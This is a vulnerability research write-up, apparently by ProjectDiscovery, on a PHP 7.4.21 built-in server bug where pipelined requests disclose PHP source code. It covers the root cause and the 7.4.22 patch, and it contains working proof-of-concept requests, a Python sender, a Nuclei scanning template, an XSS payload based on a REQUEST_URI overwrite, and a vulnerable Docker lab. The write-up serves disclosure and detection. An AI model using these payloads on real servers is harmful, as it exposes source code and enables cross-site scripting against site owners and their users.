Introduction
While testing request pipelining against the built-in servers of several programming languages, we observed strange behavior in PHP's. As we delved deeper, we discovered a security bug in PHP that could expose the source code of PHP files, serving them as if they were static files rather than executing them as intended.
Upon further testing, we found that the vulnerability was not present in the latest PHP release. We then tested different PHP versions to determine when the bug was fixed, and why. This led us to the patched version, PHP 7.4.22, and a comparison of the unpatched and patched code showed the specific changes made to fix the vulnerability.
It’s important to note that while this issue has been resolved in the PHP source code, Shodan queries reveal many exposed instances of the built-in server. Join us as we detail our findings and share what we learned through our analysis.
Root Cause Analysis
The git diff between the unpatched and patched versions: https://github.com/php/php-src/compare/PHP-7.4.21...php-7.4.22
To fully understand the bug and how it was fixed, we compiled both the patched and unpatched versions of PHP with debugging symbols enabled. Using a proof-of-concept (PoC) request, we triggered the source code disclosure bug and observed the code flow in the debugger.
PoC Request:
GET /phpinfo.php HTTP/1.1
Host: pd.research
\r\n
\r\n
GET / HTTP/1.1
\r\n
\r\n
All HTTP requests to the CLI server are handled by php_cli_server_client_read_request. The trace looks like this:
main(...)
do_cli_server(...)
php_cli_server_do_event_loop(...)
php_cli_server_do_event_for_each_fd(...)
php_cli_server_poller_iter_on_active(...)
php_cli_server_do_event_for_each_fd_callback(...)
php_cli_server_recv_event_read_request(...)
php_cli_server_client_read_request(...)
The php_cli_server_client_read_request function calls php_http_parser_execute, which, as its name suggests, parses HTTP requests. Its return value is the number of bytes that were successfully parsed. This value is used to determine how much of the request has been processed and how much remains to be parsed.
When the first part of the request mentioned below is almost finished being parsed:
GET /phpinfo.php HTTP/1.1
Host: pd.research
\r\n
\r\n
and the HTTP request doesn't contain the Content-Length header, CALLBACK2(message_complete) is called. Here, CALLBACK2 is a macro that in turn calls the callback function php_cli_server_client_read_request_on_message_complete once processing of the request message is complete.
How does CALLBACK2(…) work?
The CALLBACK2 macro is defined here: https://github.com/php/php-src/blob/PHP-7.4.21/sapi/cli/php_http_parser.c#L31-L37
#define CALLBACK2(FOR) \
do { \
  if (settings->on_##FOR) { \
    if (0 != settings->on_##FOR(parser)) return (p - data); \
  } \
} while (0)
After preprocessing, CALLBACK2(message_complete) expands to:
do {
  if (settings->on_message_complete) {
    if (0 != settings->on_message_complete(parser)) return (p - data);
  }
} while (0)
settings is a struct of type php_http_parser_settings whose member fields are function pointers. Each member of the settings variable is populated with its respective callback function:
https://github.com/php/php-src/blob/PHP-7.4.21/sapi/cli/php_cli_server.c#L1803-L1813
A reference to settings is then passed to the php_http_parser_execute function as an argument:
nbytes_consumed = php_http_parser_execute(&client->parser, &settings, buf, nbytes_read);
https://github.com/php/php-src/blob/PHP-7.4.21/sapi/cli/php_cli_server.c#L1840
Similarly, there are CALLBACK and CALLBACK_NOCLEAR macros that work in almost the same way.
Therefore, CALLBACK2(message_complete) results in calling php_cli_server_client_read_request_on_message_complete(...), CALLBACK(path) calls php_cli_server_client_read_request_on_path(...), and so on.
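The control flow of these macros can be modelled outside of C. The following Python sketch is only an illustration and not PHP's parser: Settings and parse are hypothetical names, and the toy parser assumes that every blank line (CRLF CRLF) ends a message. It shows the two properties that matter later: the hook is called once per message, and a non-zero return value stops parsing early and reports the bytes consumed so far.

```python
from dataclasses import dataclass
from typing import Callable, Optional


@dataclass
class Settings:
    """Hypothetical stand-in for php_http_parser_settings: one optional hook."""
    on_message_complete: Optional[Callable[[dict], int]] = None


def parse(data: bytes, settings: Settings, parser: dict) -> int:
    """Toy parser: treat every CRLF CRLF as the end of a message.

    Returns the number of bytes consumed, like php_http_parser_execute.
    """
    pos = 0
    while True:
        end = data.find(b"\r\n\r\n", pos)
        if end == -1:
            return len(data)  # no further message terminator in the buffer
        pos = end + 4
        # Equivalent of CALLBACK2(message_complete): call the hook if it is
        # set, and return early when it reports a non-zero value.
        if settings.on_message_complete is not None:
            if settings.on_message_complete(parser) != 0:
                return pos
```

With a hook that always returns 0, both pipelined messages are processed in a single call, which is the behavior the rest of this analysis relies on.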
Soon, we enter the php_cli_server_request_translate_vpath function. This function converts the requested PHP file's path to the full path on the file system. If the requested path is a directory, it checks for the presence of index files such as index.php or index.html within the directory and uses the path to one of those files if found. This allows the server to serve the correct file in response to a request.
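A simplified model of that lookup, as a Python sketch rather than the C implementation: translate_vpath and INDEX_FILES are illustrative names, only the two index files named in the text are tried, and the path normalization and other handling done by the real function are left out.

```python
import os
from typing import Optional

INDEX_FILES = ("index.php", "index.html")  # the names mentioned in the text


def translate_vpath(document_root: str, vpath: str) -> Optional[str]:
    """Return the filesystem path for vpath, or None if nothing matches."""
    candidate = os.path.join(document_root, vpath.lstrip("/"))
    if os.path.isfile(candidate):
        return candidate
    if os.path.isdir(candidate):
        # A directory is only served through one of its index files.
        for name in INDEX_FILES:
            index_path = os.path.join(candidate, name)
            if os.path.isfile(index_path):
                return index_path
    return None
```

The None result for a directory without an index file corresponds to the case where no translated path is produced for the request.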
In short, this function sets the vpath and path_translated members of the request struct. So, for the currently parsed request,
GET /phpinfo.php HTTP/1.1
Host: pd.research
\r\n
\r\n
we end up inside the conditional branch where request->path_translated is set. This is important and will be used later.
After the function call stack unwinds, execution continues inside php_http_parser_execute. Now the second part of the request is parsed, as the state is reverted to start_state:
GET / HTTP/1.1
\r\n
\r\n
Just as with the initial request, we enter the php_cli_server_client_read_request_on_message_complete function and then call php_cli_server_request_translate_vpath. The subsequent request is parsed and processed in the same way as the first request.
This time, inside php_cli_server_request_translate_vpath, since we are requesting a directory (/) instead of a file, we enter a different block of code.
Finally, once parsing is complete, we return from php_http_parser_execute. The number of bytes parsed (nbytes_consumed) and the number of bytes read (nbytes_read) are then compared (more on this in the Patch section). If they are equal, the code flow continues and we enter the php_cli_server_dispatch function.
This function includes a check to determine whether a requested file should be treated as a static file or executed as a PHP file. This is done by examining the extension of the file. If the extension is not .php or .PHP, or if the length of the extension is not equal to 3, the file is considered to be a static file. This is indicated by setting the is_static_file variable to 1.
The code also checks that the path_translated field of the client->request object is not null. This field contains the full path to the requested file on the file system and is used to locate and serve the file. If the path_translated field is null, the requested file could not be found, and the request will be treated as an error.
In our case, the code flow proceeds to the php_cli_server_begin_send_static function because is_static_file is set to true.
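The decision described above can be written down as a small predicate. This is a Python sketch of the described logic, not the C source: is_static_file is modelled as a function, and the case-insensitive comparison is an assumption that covers both .php and .PHP.

```python
from typing import Optional


def is_static_file(ext: Optional[str], path_translated: Optional[str]) -> bool:
    """Return True when the request would be served as a static file."""
    if ext is None or len(ext) != 3:
        return True  # missing extension or wrong length
    if ext.lower() != "php":
        return True  # assumption: compared case-insensitively
    if path_translated is None:
        return True  # no file was resolved for this request
    return False
```

Note that the predicate looks at two independent fields. Nothing in it verifies that ext and path_translated were derived from the same request.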
What went wrong?
Here lies the bug. After the second request is parsed, the vpath is set to / and, assuming no index files were found, client->request.ext is set to NULL. However, client->request.path_translated is still set to /tmp/php/phpinfo.php from the first request. The checks are performed on the client->request.ext of the second request, so we enter the branch that sets is_static_file to 1. In other words, the requested file is treated as a static file and not as a PHP script.
Notice that php_cli_server_begin_send_static opens and retrieves a file descriptor for the file path stored in client->request.path_translated. In our example, client->request.path_translated is set to /tmp/php/phpinfo.php. This discrepancy, where the checks happen on the client->request.ext of the second request but the file is then opened using the client->request.path_translated set by the first request, leads to source code disclosure.
Because the file is marked as is_static_file, the code flow simply reads from the fd and returns the contents as a static file rather than executing it.
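The stale-state problem can be reproduced with a few lines of Python. This is a model under stated assumptions, not PHP's code: Request, on_message_complete and dispatch are illustrative names, the files dictionary stands in for the filesystem lookup, and a missing key models a directory without an index file.

```python
from dataclasses import dataclass
from typing import Dict, Optional, Tuple


@dataclass
class Request:
    vpath: Optional[str] = None
    ext: Optional[str] = None
    path_translated: Optional[str] = None


def on_message_complete(req: Request, vpath: str, files: Dict[str, str]) -> None:
    """Update request state the way the unpatched flow is described above."""
    req.vpath = vpath
    name = vpath.rsplit("/", 1)[-1]
    req.ext = name.rsplit(".", 1)[1] if "." in name else None
    if vpath in files:
        req.path_translated = files[vpath]
    # Otherwise path_translated is left untouched, so an earlier value survives.


def dispatch(req: Request) -> Tuple[str, Optional[str]]:
    """Decide from the latest ext, but open whatever path_translated holds."""
    executable = (req.ext or "").lower() == "php" and req.path_translated is not None
    return ("execute" if executable else "static", req.path_translated)


files = {"/phpinfo.php": "/tmp/php/phpinfo.php"}
req = Request()
on_message_complete(req, "/phpinfo.php", files)  # first pipelined request
on_message_complete(req, "/", files)             # second request, same state
print(dispatch(req))  # ('static', '/tmp/php/phpinfo.php')
```

A single request for /phpinfo.php yields ("execute", ...) in this model. Only the combination of the two requests on one connection produces the static read of the PHP file.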
Patch
A check was introduced in PHP 7.4.22. This fix checks whether the vpath member of the request struct is not NULL when parsing the request path. If it is not NULL, the function returns 1.
When the path of the first part of the request message is parsed, client->request.vpath is initially NULL and is later set to /phpinfo.php. However, when the path of the second part of the request is parsed, client->request.vpath is already set and not NULL, which causes the function to return 1.
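In model form, the patched callback behaves roughly like the following Python sketch. Request and on_path are illustrative names, and only the vpath check described above is reproduced.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class Request:
    vpath: Optional[str] = None


def on_path(req: Request, path: str) -> int:
    """Model of the patched path callback: refuse a second path."""
    if req.vpath is not None:
        return 1  # non-zero tells the parser to stop
    req.vpath = path
    return 0


req = Request()
first = on_path(req, "/phpinfo.php")  # returns 0, vpath is now set
second = on_path(req, "/")            # returns 1, vpath is unchanged
```

The second call leaves the state of the first request intact and signals an error instead of overwriting it.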
#define CALLBACK(FOR) \
do { \
  CALLBACK_NOCLEAR(FOR); \
  FOR##_mark = NULL; \
} while (0)
#define CALLBACK_NOCLEAR(FOR) \
do { \
  if (FOR##_mark) { \
    if (settings->on_##FOR) { \
      if (0 != settings->on_##FOR(parser, \
                                 FOR##_mark, \
                                 p - FOR##_mark)) \
      { \
        return (p - data); \
      } \
    } \
  } \
} while (0)
While parsing the path of the second request, we enter the patched function php_cli_server_client_read_request_on_path via CALLBACK(path). The macro checks the return value of the callback function and expects it to be 0. If it is not, we return from the parsing function php_http_parser_execute, and the return value is the number of bytes it has consumed so far while parsing the request.
The return value is stored in the nbytes_consumed variable and is compared with nbytes_read (i.e., the actual number of bytes in the request).
nbytes_consumed = php_http_parser_execute(&client->parser, &settings, buf, nbytes_read);
if (nbytes_consumed != (size_t)nbytes_read) {
    if (php_cli_server_log_level >= PHP_CLI_SERVER_LOG_ERROR) {
        if (buf[0] & 0x80 /* SSLv2 */ || buf[0] == 0x16 /* SSLv3/TLSv1 */) {
            *errstr = estrdup("Unsupported SSL request");
        } else {
            *errstr = estrdup("Malformed HTTP request");
        }
    }
    return -1;
}
If the number of bytes consumed by the parser is not equal to the total number of bytes read, the request is considered malformed. In this case, the code checks the first byte of the buffer to determine whether the request looks like an SSL request. If so, it sets the error message to “Unsupported SSL request”; otherwise, it sets the error message to “Malformed HTTP request”. In both cases it returns -1.
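The same comparison, restated as a Python sketch. classify_parse_result is a hypothetical helper, and the log-level condition from the C code is deliberately left out, so the function only shows which message applies to a given buffer.

```python
from typing import Optional


def classify_parse_result(buf: bytes, nbytes_consumed: int) -> Optional[str]:
    """Return None when the whole buffer was parsed, else the error message."""
    if nbytes_consumed == len(buf):
        return None
    first = buf[0] if buf else 0
    # 0x80 bit set: SSLv2 record; 0x16: SSLv3/TLSv1 handshake record.
    if first & 0x80 or first == 0x16:
        return "Unsupported SSL request"
    return "Malformed HTTP request"
```

On a patched server, the pipelined request stops at the second path, so fewer bytes are consumed than were read and the request falls into the "Malformed HTTP request" case.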
Bonus
The remote source code disclosure issue was fortunately also addressed in subsequent versions by the fix for a different bug: https://bugs.php.net/bug.php?id=73630. During the parsing of an HTTP request, when certain callbacks are called multiple times, the REQUEST_URI server variable gets overwritten with a substring of itself.
This behavior can result in open redirects or cross-site scripting (XSS) attacks in some cases. Here’s an example:
Example Snippet:
<a href="<?php echo htmlentities($_SERVER['REQUEST_URI']) ?>">Unexpected url</a>
Requesting GET /index.php?abcd results in the following being rendered:
<a href="/index.php?abcd">Unexpected url</a>
Because the value starts with a path, the hyperlink is always relative to the domain where it is hosted. In addition, htmlentities converts meta-characters to their HTML entities. Therefore, XSS is not feasible in the normal case.
However, this can still be exploited by an attacker who sends a GET request with a very long query string in the URL, such as the following:
GET /?[AAAA...<1425 times>]javascript:alert(1) HTTP/1.1
Host: pd.research
The REQUEST_URI is overwritten and ends up containing only javascript:alert(1). The amount of padding required to successfully overwrite it with the desired content varies and may need to be adjusted.
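The reason entity encoding does not help once REQUEST_URI no longer starts with a slash can be shown with a short sketch. Python's html.escape is used here as a stand-in for PHP's htmlentities (an assumption for illustration; the two functions are not identical), and render_link is a hypothetical helper that mimics the example snippet.

```python
import html


def render_link(request_uri: str) -> str:
    """Mimic the example snippet: escape the URI and place it in an href."""
    escaped = html.escape(request_uri, quote=True)
    return '<a href="{}">Unexpected url</a>'.format(escaped)


normal = render_link("/index.php?abcd")
overwritten = render_link("javascript:alert(1)")
```

The string javascript:alert(1) contains no HTML meta-characters, so escaping leaves it unchanged and the href carries a javascript: URL.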
Proof of Concept
Basic POC:
GET /phpinfo.php HTTP/1.1
Host: pd.research
\r\n
GET / HTTP/1.1
\r\n
\r\n
The above is a basic HTTP request that serves as a proof of concept: it discloses the source code of phpinfo.php instead of executing it.
We observed that the source code won’t be disclosed if an index.php file exists in the directory the server is started from. However, we came up with a slight modification of the exploit POC that discloses the source code regardless of whether the index.php file exists. The reason for this lies in the above explanation of the bug.
Upgraded POC:
GET /index.php HTTP/1.1
Host: pd.research
\r\n
GET /xyz.xyz HTTP/1.1
\r\n
\r\n
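For testing against your own lab instance (for example the Docker setup in the Demo section), the two requests can be assembled programmatically. The following Python sketch makes some assumptions: build_pipelined_payload and send_raw are hypothetical helpers, and the exact placement of CRLF sequences is our reading of the listings above, with a blank line ending the first request and another ending the second.

```python
import socket


def build_pipelined_payload(first_path: str, second_path: str, host: str) -> bytes:
    """Build two back-to-back requests; only the first carries a Host header."""
    first = f"GET {first_path} HTTP/1.1\r\nHost: {host}\r\n\r\n"
    second = f"GET {second_path} HTTP/1.1\r\n\r\n"
    return (first + second).encode("ascii")


def send_raw(address: str, port: int, payload: bytes, timeout: float = 5.0) -> bytes:
    """Send payload over one TCP connection and return whatever comes back."""
    chunks = []
    with socket.create_connection((address, port), timeout=timeout) as sock:
        sock.sendall(payload)
        try:
            while True:
                chunk = sock.recv(4096)
                if not chunk:
                    break
                chunks.append(chunk)
        except socket.timeout:
            pass  # the server kept the connection open; keep what was received
    return b"".join(chunks)
```

For example, send_raw("127.0.0.1", 8888, build_pipelined_payload("/index.php", "/xyz.xyz", "pd.research")) sends the upgraded POC to a local test container. Both requests must travel on the same connection, which is why a raw socket is used instead of an HTTP client library.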
Nuclei Template:
To make detection easy to automate against a large set of hosts, we have created a Nuclei template and added it to the public nuclei-templates GitHub repository.
Template pull request: https://github.com/projectdiscovery/nuclei-templates/pull/6633
id: php-src-disclosure

info:
  name: PHP <= 7.4.21 - Built-in Server Remote Source Disclosure
  author: pdteam
  severity: medium
  metadata:
    verified: true
    shodan-query: The requested resource <code class="url">
  tags: php,phpcli,disclosure

requests:
  - raw:
      - |+
        GET / HTTP/1.1
        Host: {{Hostname}}

        GET /{{rand_base(3)}}.{{rand_base(2)}} HTTP/1.1

      - |+
        GET / HTTP/1.1
        Host: {{Hostname}}

    unsafe: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_1, "<?php")'
          - '!contains(body_2, "<?php")'
        condition: and
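The matcher logic of the template is simple enough to restate in a few lines. This Python sketch only mirrors the two dsl conditions; is_vulnerable is a hypothetical name, and body_1 and body_2 stand for the responses to the pipelined and the plain request respectively.

```python
def is_vulnerable(body_1: str, body_2: str, marker: str = "<?php") -> bool:
    """True when only the pipelined response leaks raw PHP source."""
    return marker in body_1 and marker not in body_2
```

The second condition guards against false positives: a page that legitimately prints "<?php" in its normal output would match both bodies and is therefore not reported.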
Demo
cat index.php
<a href="<?php echo htmlentities($_SERVER['REQUEST_URI']) ?>">Unexpected url</a>
cat Dockerfile
FROM php:7.4.21-zts-buster
COPY index.php /var/www/html/index.php
CMD ["php", "-S", "0.0.0.0:8888", "-t", "/var/www/html/"]
docker build . -t phptest
docker run -p 8888:8888 phptest
[Sat Jan 28 20:09:07 2023] PHP 7.4.21 Development Server (http://0.0.0.0:8888) started
Conclusion
In conclusion, our research aimed to investigate request pipelining across multilayered architectures. As part of our study, we examined the PHP built-in server and stumbled upon a security bug present in an older version of PHP on the test server. This vulnerability could allow the source code of PHP files to be exposed as if they were static files. Our investigation showed that the issue was fixed in a later version of PHP, specifically PHP 7.4.22.
It is important to note that even though the PHP team advises against using the CLI server in production, at least a few thousand exposed instances of the built-in server are still present on the Internet. Additionally, the PHP CLI server may sit behind one or more reverse proxies or load balancers, which would make the bug more challenging to exploit. In our testing with servers such as NGINX and Apache in front of the PHP CLI server, we were unable to exploit the vulnerability. We welcome feedback from readers on any other configurations or methods that may be used to exploit this vulnerability.
- Rahul Maini, Harsh Jaiswal @ ProjectDiscovery Research